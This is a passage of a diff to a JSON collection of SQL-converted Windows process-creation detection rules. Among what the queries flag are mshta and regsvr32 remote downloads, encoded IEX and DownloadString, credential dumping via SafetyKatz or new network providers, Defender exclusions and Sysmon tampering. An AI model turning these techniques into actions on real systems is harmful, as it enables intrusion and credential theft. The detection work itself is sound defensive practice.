'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Start of NT Virtual DOS Machine", - "id": "16905e21-66ee-42fe-b256-1318ada2d770", - "status": "experimental", - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "author": "frack113", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", + "status": "test", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.defense_evasion" + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_16bit_application.yml" + 
"filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "status": "test", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1564.004" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "Registry Modification Via Regini.EXE", - 
"id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", - "status": "experimental", - "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate modification of keys" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND NOT (CommandLine REGEXP ':[^ \\\\]'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regini_execution.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", + "title": "Sysmon Configuration Update", + "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "status": "test", + "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrators might use this command to update Sysmon configuration." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" }, { - "title": "Launch-VsDevShell.PS1 Proxy Execution", - "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", "status": "experimental", - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. 
Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of the script by a developer" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", - "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX 
-Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Execute Code with Pester.bat as Parent", - "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "title": "JSC Convert Javascript To Executable", + "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "status": "experimental", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1216" + "attack.t1127" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' 
OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pester.yml" + "filename": "proc_creation_win_lolbin_jsc.yml" }, { - "title": "Powershell Defender Exclusion", - "id": "17769c90-230e-488b-a463-e05c08e9d48f", - "status": "experimental", - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", - "author": "Florian Roth (Nextron Systems)", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "status": "test", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine 
LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", - "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", "status": "experimental", - "description": "Detects 
the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "Sysprep on AppData Folder", - "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "title": "Suspicious Query of MachineGUID", + "id": "f5240972-3938-4e56-8e4b-e33893176c1f", "status": "test", - "description": "Detects suspicious sysprep process start with AppData folder as target (as used 
by Trojan Syndicasec in Thrip report by Symantec)", - "author": "Florian Roth (Nextron Systems)", + "description": "Use of reg to get MachineGuid information", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Cryptography%' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%MachineGuid%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysprep_appdata.yml" + "filename": "proc_creation_win_reg_machineguid.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", - "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "status": "experimental", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 
'%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Service Security Descriptor Tampering Via Sc.EXE", - "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + 
"author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_modification.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "Suspicious Execution Of PDQDeployRunner", - "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Legitimate use" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": 
